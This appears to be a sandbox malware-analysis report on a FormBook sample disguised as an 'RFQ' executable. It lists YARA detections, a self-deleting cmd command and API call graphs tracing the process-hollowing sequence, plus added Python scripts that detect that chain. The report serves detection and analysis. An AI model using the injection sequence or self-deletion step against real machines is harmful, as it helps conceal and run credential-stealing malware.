                                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.4142849705.0000000002B00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4142849705.0000000002B00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4142849705.0000000002B00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.4142849705.0000000002B00000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.4142849705.0000000002B00000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                Target ID:8
                                                                                                                                                                                Start time:08:47:11
                                                                                                                                                                                Start date:07/10/2024
                                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:/c del "C:\Users\user\Desktop\RFQ 245801.exe"
                                                                                                                                                                                Imagebase:0x1d0000
                                                                                                                                                                                File size:236'544 bytes
                                                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:high
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                Target ID:9
                                                                                                                                                                                Start time:08:47:12
                                                                                                                                                                                Start date:07/10/2024
                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:high
                                                                                                                                                                                Has exited:true

Execution Graph

Execution Coverage:7.9%
Dynamic/Decrypted Code Coverage:100%
Signature Coverage:0%
Total number of Nodes:204
Total number of Limit Nodes:18
                                                                                                                                                                                  execution_graph 22602 733a068 22603 733a1f3 22602->22603 22604 733a08e 22602->22604 22604->22603 22607 733a2e1 22604->22607 22610 733a2e8 PostMessageW 22604->22610 22608 733a2e8 PostMessageW 22607->22608 22609 733a354 22608->22609 22609->22604 22611 733a354 22610->22611 22611->22604 22612 73357af 22613 7335769 22612->22613 22614 733579c 22612->22614 22618 7338e20 22614->22618 22641 7338dd8 22614->22641 22663 7338dc9 22614->22663 22619 7338dff 22618->22619 22620 7338e2e 22618->22620 22639 7338e16 22619->22639 22686 73395d7 22619->22686 22693 73392d0 22619->22693 22701 7339591 22619->22701 22706 73399b3 22619->22706 22711 73396a8 22619->22711 22716 7339365 22619->22716 22721 7339b66 22619->22721 22726 7339347 22619->22726 22731 7339703 22619->22731 22739 7339323 22619->22739 22744 733947c 22619->22744 22749 73393dc 22619->22749 22754 73397dc 22619->22754 22759 733963d 22619->22759 22764 73399f9 22619->22764 22769 73393ba 22619->22769 22774 73393d4 22619->22774 22779 73393f5 22619->22779 22790 7339237 22619->22790 22620->22613 22639->22613 22642 7338df2 22641->22642 22643 7338e16 22642->22643 22644 73399b3 2 API calls 22642->22644 22645 7339591 2 API calls 22642->22645 22646 73392d0 4 API calls 22642->22646 22647 73395d7 4 API calls 22642->22647 22648 7339237 4 API calls 22642->22648 22649 73393f5 6 API calls 22642->22649 22650 73393d4 2 API calls 22642->22650 22651 73393ba 2 API calls 22642->22651 22652 73399f9 2 API calls 22642->22652 22653 733963d 2 API calls 22642->22653 22654 73397dc 2 API calls 22642->22654 22655 73393dc 2 API calls 22642->22655 22656 733947c 2 API calls 22642->22656 22657 7339323 2 API calls 22642->22657 22658 7339703 2 API calls 22642->22658 22659 7339347 2 API calls 22642->22659 22660 7339b66 2 API calls 22642->22660 22661 7339365 2 API calls 22642->22661 22662 
73396a8 2 API calls 22642->22662 22643->22613 22644->22643 22645->22643 22646->22643 22647->22643 22648->22643 22649->22643 22650->22643 22651->22643 22652->22643 22653->22643 22654->22643 22655->22643 22656->22643 22657->22643 22658->22643 22659->22643 22660->22643 22661->22643 22662->22643 22664 7338da7 22663->22664 22665 7338dd6 22663->22665 22664->22613 22666 7338e16 22665->22666 22667 73399b3 2 API calls 22665->22667 22668 7339591 2 API calls 22665->22668 22669 73392d0 4 API calls 22665->22669 22670 73395d7 4 API calls 22665->22670 22671 7339237 4 API calls 22665->22671 22672 73393f5 6 API calls 22665->22672 22673 73393d4 2 API calls 22665->22673 22674 73393ba 2 API calls 22665->22674 22675 73399f9 2 API calls 22665->22675 22676 733963d 2 API calls 22665->22676 22677 73397dc 2 API calls 22665->22677 22678 73393dc 2 API calls 22665->22678 22679 733947c 2 API calls 22665->22679 22680 7339323 2 API calls 22665->22680 22681 7339703 2 API calls 22665->22681 22682 7339347 2 API calls 22665->22682 22683 7339b66 2 API calls 22665->22683 22684 7339365 2 API calls 22665->22684 22685 73396a8 2 API calls 22665->22685 22666->22613 22667->22666 22668->22666 22669->22666 22670->22666 22671->22666 22672->22666 22673->22666 22674->22666 22675->22666 22676->22666 22677->22666 22678->22666 22679->22666 22680->22666 22681->22666 22682->22666 22683->22666 22684->22666 22685->22666 22798 7334e10 22686->22798 22802 7334e08 22686->22802 22687 7339347 22806 7334921 22687->22806 22810 7334928 22687->22810 22688 733984a 22694 73392d6 22693->22694 22696 7339304 22694->22696 22814 7335230 22694->22814 22818 7335224 22694->22818 22695 7339ae4 22695->22639 22696->22639 22696->22695 22699 7334e10 Wow64SetThreadContext 22696->22699 22700 7334e08 Wow64SetThreadContext 22696->22700 22699->22696 22700->22696 22702 7339654 22701->22702 22702->22639 22703 7339c10 22702->22703 22822 7335091 22702->22822 22826 7335098 22702->22826 22703->22639 22708 733963d 22706->22708 22707 7339c10 22707->22639 
22708->22639 22708->22707 22709 7335091 ReadProcessMemory 22708->22709 22710 7335098 ReadProcessMemory 22708->22710 22709->22708 22710->22708 22712 7339a1d 22711->22712 22830 7334fa0 22712->22830 22834 7334fa8 22712->22834 22713 7339916 22713->22639 22717 733932f 22716->22717 22717->22639 22718 7339ae4 22717->22718 22719 7334e10 Wow64SetThreadContext 22717->22719 22720 7334e08 Wow64SetThreadContext 22717->22720 22718->22639 22719->22717 22720->22717 22722 7339a1d 22721->22722 22724 7334fa0 WriteProcessMemory 22722->22724 22725 7334fa8 WriteProcessMemory 22722->22725 22723 7339916 22723->22639 22724->22723 22725->22723 22727 733934d 22726->22727 22729 7334921 ResumeThread 22727->22729 22730 7334928 ResumeThread 22727->22730 22728 733984a 22729->22728 22730->22728 22732 7339723 22731->22732 22737 7335091 ReadProcessMemory 22732->22737 22738 7335098 ReadProcessMemory 22732->22738 22733 73396d1 22733->22639 22734 7339c10 22733->22734 22735 7335091 ReadProcessMemory 22733->22735 22736 7335098 ReadProcessMemory 22733->22736 22734->22639 22735->22733 22736->22733 22737->22733 22738->22733 22740 733932f 22739->22740 22740->22639 22741 7339ae4 22740->22741 22742 7334e10 Wow64SetThreadContext 22740->22742 22743 7334e08 Wow64SetThreadContext 22740->22743 22741->22639 22742->22740 22743->22740 22747 7334fa0 WriteProcessMemory 22744->22747 22748 7334fa8 WriteProcessMemory 22744->22748 22745 7339452 22745->22744 22746 7339bf1 22745->22746 22746->22639 22747->22745 22748->22745 22751 733932f 22749->22751 22750 7339ae4 22750->22639 22751->22639 22751->22750 22752 7334e10 Wow64SetThreadContext 22751->22752 22753 7334e08 Wow64SetThreadContext 22751->22753 22752->22751 22753->22751 22755 733932f 22754->22755 22755->22639 22755->22754 22756 7339ae4 22755->22756 22757 7334e10 Wow64SetThreadContext 22755->22757 22758 7334e08 Wow64SetThreadContext 22755->22758 22756->22639 22757->22755 22758->22755 22761 7339643 22759->22761 22760 7339c10 22760->22639 22761->22639 22761->22760 22762 
Call graph (continued). The report renders this as a node/edge diagram; what survives in the text is the node list, of which only the API-bearing nodes are meaningful: ReadProcessMemory at 7335091, 7335098, 73350e3; Wow64SetThreadContext at 7334e08, 7334e10, 7334e55; ResumeThread at 7334921, 7334928, 7334968; WriteProcessMemory at 7334fa0, 7334fa8, 7334ff0; VirtualAllocEx at 7334ee8, 7334f28; CreateProcessA at 7335224, 7335230, 733541e; GetModuleHandleW at 29eb6e0. Within this fragment the edges chain VirtualAllocEx to WriteProcessMemory to Wow64SetThreadContext and CreateProcessA to Wow64SetThreadContext; together with the ResumeThread nodes this is the process-hollowing sequence flagged in the report's signatures.
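The edge dump above is the report's call graph flattened to text. As an added example (my code, not Joe Sandbox's and not part of the report), the Python below parses that token format as I read it: a node is a numeric id followed by a hex address and an optional API name, and `a->b` is an edge. It then reports every API call site, checks whether all five stages of the process-hollowing chain (CreateProcessA, VirtualAllocEx, WriteProcessMemory, Wow64SetThreadContext, ResumeThread) are present, and finds which adjacent stages are joined by an explicit path. The embedded input is an abridged transcription of the edge lines above; the token-format interpretation and the stage order are assumptions.

```python
"""Parse a Joe Sandbox call-graph edge dump and check it for the process-hollowing API chain.

Added example, not Joe Sandbox code. Assumed token format (my reading of the dump):
  "<node-id> <hex-addr> [ApiName]"  defines a node;   "<id>-><id>"  is an edge.
"""
import re
from collections import defaultdict, deque

# Constructed input: an abridged transcription of the call-graph text in the report.
GRAPH_TEXT = """
22762 7335091 ReadProcessMemory 22761->22762 22763 7335098 ReadProcessMemory 22761->22763 22762->22761 22763->22761
22765 733932f 22764->22765 22765->22639 22766 7339ae4 22765->22766
22767 7334e10 Wow64SetThreadContext 22765->22767 22768 7334e08 Wow64SetThreadContext 22765->22768 22766->22639 22767->22765 22768->22765
22770 73393c7 22769->22770 22772 7334921 ResumeThread 22770->22772 22773 7334928 ResumeThread 22770->22773 22771 733984a 22772->22771 22773->22771
22838 7334ee0 22779->22838 22780 73399ad 22781 7339413 22781->22780 22782 733932f 22781->22782
22784 7334fa0 WriteProcessMemory 22781->22784 22785 7334fa8 WriteProcessMemory 22781->22785 22782->22639 22784->22781 22785->22781
22786 7334e10 Wow64SetThreadContext 22782->22786 22787 7334e08 Wow64SetThreadContext 22782->22787 22786->22782 22787->22782
22791 733923d 22790->22791 22796 7335230 CreateProcessA 22791->22796 22797 7335224 CreateProcessA 22791->22797 22793 7339304 22793->22639 22796->22793 22797->22793
22794 7334e10 Wow64SetThreadContext 22793->22794 22795 7334e08 Wow64SetThreadContext 22793->22795 22794->22793 22795->22793
22839 7334ee8 VirtualAllocEx 22838->22839 22841 7334f65 22839->22841 22841->22781
"""

# Assumed stage order of the hollowing chain seen in this sample's call graph.
HOLLOWING_CHAIN = ["CreateProcessA", "VirtualAllocEx", "WriteProcessMemory",
                   "Wow64SetThreadContext", "ResumeThread"]

NODE_ID = re.compile(r"^\d+$")
HEX_ADDR = re.compile(r"^[0-9a-f]+$")
API_NAME = re.compile(r"^[A-Za-z_]\w*$")


def parse_graph(text):
    """Return ({node_id: (addr, api_or_None)}, {src_id: set(dst_id)})."""
    nodes, edges = {}, defaultdict(set)
    toks = text.split()
    i = 0
    while i < len(toks):
        tok = toks[i]
        if "->" in tok:
            src, dst = tok.split("->", 1)
            edges[src].add(dst)
            i += 1
        elif NODE_ID.match(tok) and i + 1 < len(toks) and HEX_ADDR.match(toks[i + 1]):
            api = None
            if i + 2 < len(toks) and API_NAME.match(toks[i + 2]) and not HEX_ADDR.match(toks[i + 2]):
                api = toks[i + 2]
            nodes[tok] = (toks[i + 1], api)
            i += 3 if api else 2
        else:
            i += 1  # unrecognised token (e.g. "call" in intra-function graphs): skip it
    return nodes, edges


def api_call_sites(nodes):
    """Map API name -> set of call-site addresses."""
    sites = defaultdict(set)
    for addr, api in nodes.values():
        if api:
            sites[api].add(addr)
    return dict(sites)


def reaches(edges, start, goals):
    """BFS over the edge map: True if any node in `goals` is reachable from `start`."""
    seen, queue = {start}, deque([start])
    while queue:
        for nxt in edges.get(queue.popleft(), ()):
            if nxt in goals:
                return True
            if nxt not in seen:
                seen.add(nxt)
                queue.append(nxt)
    return False


def hollowing_stages(nodes, edges, chain=HOLLOWING_CHAIN):
    """Return (stages that have call sites, adjacent stage pairs joined by a path)."""
    by_api = defaultdict(set)
    for nid, (_, api) in nodes.items():
        if api:
            by_api[api].add(nid)
    present = [api for api in chain if api in by_api]
    linked = [(a, b) for a, b in zip(chain, chain[1:])
              if any(reaches(edges, s, by_api.get(b, set())) for s in by_api.get(a, ()))]
    return present, linked


def is_hollowing_chain_complete(nodes, chain=HOLLOWING_CHAIN):
    """True when every stage of the chain has at least one call site in the graph."""
    sites = api_call_sites(nodes)
    return all(api in sites for api in chain)


if __name__ == "__main__":
    g_nodes, g_edges = parse_graph(GRAPH_TEXT)
    for api, addrs in sorted(api_call_sites(g_nodes).items()):
        print(f"{api:22s} {' '.join(sorted(addrs))}")
    present, linked = hollowing_stages(g_nodes, g_edges)
    print("stages present:", present)
    print("stages linked by a path:", linked)
    print("hollowing chain complete:", is_hollowing_chain_complete(g_nodes))
```

On this excerpt all five stages have call sites, and VirtualAllocEx to WriteProcessMemory and WriteProcessMemory to Wow64SetThreadContext are joined by explicit paths. CreateProcessA to VirtualAllocEx and Wow64SetThreadContext to ResumeThread run through nodes (22639, 22769, 22779) that are only referenced, not defined, in the transcribed fragment, so those links cannot be closed without the full dump. The presence of all five call sites in one code region is the strong signal; path linkage is corroboration, not a requirement, because the graph text in a report is rarely complete.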
Strings
Memory Dump Source
• Source File: 00000000.00000002.1754007847.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7330000_RFQ 245801.jbxd
Similarity
• API ID:
• String ID: r
• API String ID: 0-1812594589
• Opcode ID: 9ffe0fe57471c33edb2feaccaf0e4ec3e971239e0c2f6222f430d6d55008e155
• Instruction ID: a7a068f3e86ff16fbffcb96b787c5d7e6971cf4be37d7c574dc4e1967bf302ef
• Opcode Fuzzy Hash: 9ffe0fe57471c33edb2feaccaf0e4ec3e971239e0c2f6222f430d6d55008e155
• Instruction Fuzzy Hash: BB516CF4D19208CFDB18CFA9C4445EDBBBBBF4A311F1490A6E409AB212DB359985CF51
Memory Dump Source
• Source File: 00000000.00000002.1754007847.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7330000_RFQ 245801.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3c48aae0319caed2001d100c41aec8efba4845c7e2f4add778f549f958715386
• Instruction ID: 9473f3a480973fbbd396543e8796362e290056c3644c3eb9a1bb8bd2e3708977
• Opcode Fuzzy Hash: 3c48aae0319caed2001d100c41aec8efba4845c7e2f4add778f549f958715386
• Instruction Fuzzy Hash: 9CE1AFB1B016059FEB29DB65C4507AEB7F7AF89701F14846DE18ADB2A0CB35E802CB51
Memory Dump Source
• Source File: 00000000.00000002.1754007847.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7330000_RFQ 245801.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9da16dd1c48dd9224136f5d137de4ac0b5435598b3082d7bb0ddf74553afbf09
• Instruction ID: de38e87e85ecffea599ed5950f4c41553c55bee62ade990ec6a5415f91c25676
• Opcode Fuzzy Hash: 9da16dd1c48dd9224136f5d137de4ac0b5435598b3082d7bb0ddf74553afbf09
• Instruction Fuzzy Hash: C0D05EF8C5910CCFE764CF50D0416F8FBBCBB0B304F006091D44EAB225C631A8818E54
Memory Dump Source
• Source File: 00000000.00000002.1754007847.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7330000_RFQ 245801.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bbac74fdfdb55768450b3d78b5f618906269d45403d30d7ac7c91562cc33e6a7
• Instruction ID: 102b8bbfd52ed81a7fbb5739c13c9beaa562d9abe9c98995e373ac7de562a5bd
• Opcode Fuzzy Hash: bbac74fdfdb55768450b3d78b5f618906269d45403d30d7ac7c91562cc33e6a7
• Instruction Fuzzy Hash: CEA002C5CAF54DC4F0742D721440AB5D07C664B40DE51B81440CF7781A4495E011142D

Control-flow Graph
Rendered as an image in the report; recoverable from its node list: entry block 7335224-73352c5, CreateProcessA called from block 73353bf-7335479, final block 7335575.
APIs
• CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 07335466
Memory Dump Source
• Source File: 00000000.00000002.1754007847.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7330000_RFQ 245801.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: bff5951d83fd967c1a2c02c83c863ae8d508a88f0c226ee80698b08856410ea1
• Instruction ID: 865fc1ae126d5c988e4c5a847761f93ea6f91676835a07bc36bb8c836e99127a
• Opcode Fuzzy Hash: bff5951d83fd967c1a2c02c83c863ae8d508a88f0c226ee80698b08856410ea1
• Instruction Fuzzy Hash: 64A16DB1D0021ADFEF24CFA8C840BDDBBB2BF44314F14856AE809A7250D7759995CF92

Control-flow Graph
Rendered as an image in the report; recoverable from its node list: entry block 7335230-73352c5, CreateProcessA called from block 73353bf-7335479, final block 7335575. This is the same body as the function at 7335224 reached through a second entry.
APIs
• CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 07335466
Memory Dump Source
• Source File: 00000000.00000002.1754007847.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7330000_RFQ 245801.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: e43e2faa389aef46f2063990788ff59cf9c1593202263b125f067c71c1cd6bc3
• Instruction ID: 74c878e31b608b6c444def4cc4d207d1ccfdf8cda2d54c3472a3aa130b4b7f87
• Opcode Fuzzy Hash: e43e2faa389aef46f2063990788ff59cf9c1593202263b125f067c71c1cd6bc3
• Instruction Fuzzy Hash: D3915DB1D00219DFEF24CF68C841BDDBBB2BF44314F14856AE809A7250D7759995CF92

Control-flow Graph
Rendered as an image in the report; recoverable from its node list: entry block 29eb498-29eb4b7, internal calls to 29ea7a4, 29eb740/29eb731, 29ea7b0, 29ea7c0, 29ea7d0, 29ea7e0 and 29eba20/29eb9f1, GetModuleHandleW called from block 29eb6e0-29eb70b, final block 29eb714-29eb728.
APIs
• GetModuleHandleW.KERNEL32(00000000), ref: 029EB6FE
Memory Dump Source
• Source File: 00000000.00000002.1745402178.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_29e0000_RFQ 245801.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: 87e5f47286cf59b76e146213ad115991bcb1e19638d7de6ebfa7857feaf0a48b
• Instruction ID: 9486f69b2306f7d7d5ed48613cb48f10bbd93f71d836d737493d0c880e54f9cd
• Opcode Fuzzy Hash: 87e5f47286cf59b76e146213ad115991bcb1e19638d7de6ebfa7857feaf0a48b
• Instruction Fuzzy Hash: 9C812470A00B058FDB25DF29D05579ABBF5FF88308F108A29D48AD7A50DB75E946CB90

Control-flow Graph
Rendered as an image in the report; recoverable from its node list: entry block 7334fa0-7334ff6, WriteProcessMemory called from block 7335006-7335045, final block 733504e-733507e.
APIs
• WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 07335038
Memory Dump Source
• Source File: 00000000.00000002.1754007847.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7330000_RFQ 245801.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Opcode ID: 3a837b8307f28825833d7c8887f70e95bafc2c7b6e1daf89b271a6b67b2f9538
• Instruction ID: 8b5ae534980e79e6e9744655614c265dad740212b993113141392cae945f34b8
• Opcode Fuzzy Hash: 3a837b8307f28825833d7c8887f70e95bafc2c7b6e1daf89b271a6b67b2f9538
• Instruction Fuzzy Hash: 5A2166B19003499FDB10CFA9C880BDEBBF1FF48310F10842AE958A7240D7799950CFA5
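The per-function records in this report repeat the same API reference under several entry addresses: the functions at 7335224 and 7335230 both carry `CreateProcessA ... ref: 07335466` with near-identical instruction fuzzy hashes, which marks them as one body with two entry stubs. As an added example (my code, not Joe Sandbox's and not part of the report), the Python below parses these records as I read their layout (fields are `• Name: value` lines, API calls are `• Api.MODULE(args), ref: ADDR` lines, and `Instruction Fuzzy Hash` closes each record), groups them by API reference so such duplicates collapse, and measures how closely two fuzzy hashes agree. The embedded input is four records transcribed from this page and trimmed to the fields used.

```python
"""Parse the per-function API / dump-source / hash records of a Joe Sandbox report
and collapse records that are the same code reached through different entry stubs.

Added example, not Joe Sandbox code. The record layout below is my reading of the
report text: "• Name: value" fields, "• Api.MODULE(args), ref: ADDR" API lines, and
"Instruction Fuzzy Hash" as the last field of every record.
"""
import re
from collections import defaultdict

# Constructed input: four records transcribed from the report, reduced to the fields used here.
RECORDS_TEXT = """
APIs
• CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 07335466
Memory Dump Source
• Source File: 00000000.00000002.1754007847.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
Similarity
• API ID: CreateProcess
• Opcode ID: bff5951d83fd967c1a2c02c83c863ae8d508a88f0c226ee80698b08856410ea1
• Instruction Fuzzy Hash: 64A16DB1D0021ADFEF24CFA8C840BDDBBB2BF44314F14856AE809A7250D7759995CF92
APIs
• CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 07335466
Memory Dump Source
• Source File: 00000000.00000002.1754007847.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
Similarity
• API ID: CreateProcess
• Opcode ID: e43e2faa389aef46f2063990788ff59cf9c1593202263b125f067c71c1cd6bc3
• Instruction Fuzzy Hash: D3915DB1D00219DFEF24CF68C841BDDBBB2BF44314F14856AE809A7250D7759995CF92
APIs
• WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 07335038
Memory Dump Source
• Source File: 00000000.00000002.1754007847.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
Similarity
• API ID: MemoryProcessWrite
• Opcode ID: 3a837b8307f28825833d7c8887f70e95bafc2c7b6e1daf89b271a6b67b2f9538
• Instruction Fuzzy Hash: 5A2166B19003499FDB10CFA9C880BDEBBF1FF48310F10842AE958A7240D7799950CFA5
APIs
• GetModuleHandleW.KERNEL32(00000000), ref: 029EB6FE
Memory Dump Source
• Source File: 00000000.00000002.1745402178.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
Similarity
• API ID: HandleModule
• Opcode ID: 87e5f47286cf59b76e146213ad115991bcb1e19638d7de6ebfa7857feaf0a48b
• Instruction Fuzzy Hash: 9C812470A00B058FDB25DF29D05579ABBF5FF88308F108A29D48AD7A50DB75E946CB90
"""

API_LINE = re.compile(r"^• (\w+)\.(\w+)\((.*)\), ref: ([0-9A-Fa-f]+)$")
FIELD_LINE = re.compile(r"^• ([^:]+): ?(.*)$")
OFFSET = re.compile(r"Offset: ([0-9A-Fa-f]+)")


def parse_records(text):
    """Return a list of dicts, one per record, with an "apis" list of (api, module, ref)."""
    records, cur = [], {"apis": []}
    for line in text.splitlines():
        line = line.strip()
        m = API_LINE.match(line)
        if m:  # must be tested before FIELD_LINE, which would also match an API line
            cur["apis"].append((m.group(1), m.group(2), m.group(4)))
            continue
        m = FIELD_LINE.match(line)
        if not m:
            continue  # section headings such as "APIs" or "Similarity"
        name, value = m.group(1), m.group(2)
        cur[name] = value
        if name == "Source File":
            off = OFFSET.search(value)
            cur["offset"] = off.group(1) if off else None
        elif name == "Instruction Fuzzy Hash":  # last field of a record: close it
            records.append(cur)
            cur = {"apis": []}
    return records


def group_by_api_ref(records):
    """(api, ref addr) -> sorted Opcode IDs. More than one ID for a single ref means the
    same function body was recorded under more than one entry address."""
    groups = defaultdict(list)
    for rec in records:
        for api, _module, ref in rec["apis"]:
            groups[(api, ref)].append(rec["Opcode ID"])
    return {key: sorted(ids) for key, ids in groups.items()}


def fuzzy_hash_agreement(a, b):
    """(matching positions, length) for two same-length instruction fuzzy hashes."""
    if len(a) != len(b):
        raise ValueError("fuzzy hashes differ in length")
    return sum(x == y for x, y in zip(a, b)), len(a)


def dump_regions(records):
    """Set of memory-dump offsets the records were carved from."""
    return {rec["offset"] for rec in records}


if __name__ == "__main__":
    recs = parse_records(RECORDS_TEXT)
    for (api, ref), ids in group_by_api_ref(recs).items():
        print(f"{api} @ {ref}: {len(ids)} record(s)")
    pair = [r for r in recs if ("CreateProcessA", "KERNEL32", "07335466") in r["apis"]]
    print("CreateProcessA pair agreement:",
          fuzzy_hash_agreement(pair[0]["Instruction Fuzzy Hash"], pair[1]["Instruction Fuzzy Hash"]))
    print("dump regions:", sorted(dump_regions(recs)))
```

Grouping by `(api, ref)` rather than by Opcode ID is what makes the duplicate visible: the two CreateProcessA records have different Opcode IDs but the same call-site reference and agree in 63 of 70 fuzzy-hash positions, so for IOC or clustering purposes they count as one function. The last `WriteProcessMemory` record on this page is truncated before its hash fields and would be dropped by this parser, which is the behaviour you want for a record that cannot be matched.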

Control-flow Graph
Rendered as an image in the report; recoverable from its node list: entry block 7334fa8-7334ff6, WriteProcessMemory called from block 7335006-7335045, final block 733504e-733507e. This is the same body as the function at 7334fa0 reached through a second entry.
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 07335038
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1754007847.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7330000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3559483778-0
                                                                                                                                                                                  • Opcode ID: 5bb70b0249643468f5d55b2ec786e10b56135513bb1eab8ab865eee0f3d7f546
                                                                                                                                                                                  • Instruction ID: f56f46ffb57381f6123b38325cfdadb44896598c0235cf2fd1a58c1489697f34
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5bb70b0249643468f5d55b2ec786e10b56135513bb1eab8ab865eee0f3d7f546
                                                                                                                                                                                  • Instruction Fuzzy Hash: 262166B19003599FDB10CFA9C881BDEBBF5FF48310F10842AE918A7250D7799954CFA5

Control-flow Graph
• Basic blocks: 378: 7334e08-7334e5b; 381: 7334e6b-7334e9b (Wow64SetThreadContext); 382: 7334e5d-7334e69; 384: 7334ea4-7334ed4; 385: 7334e9d-7334ea3
• Edges: 378->381, 378->382, 381->384, 381->385, 382->381, 385->384
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07334E8E
Memory Dump Source
• Source File: 00000000.00000002.1754007847.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7330000_RFQ 245801.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0
• Opcode ID: c388fcce0e94ae8f6d2d40ac0068a43cc8c62ae0b8262497cb5d1ba30829e405
• Instruction ID: 37ed33a1b9ab3cbec752fb483d69af64a5c794507a8fe90997e36dc9d2f2a693
• Opcode Fuzzy Hash: c388fcce0e94ae8f6d2d40ac0068a43cc8c62ae0b8262497cb5d1ba30829e405
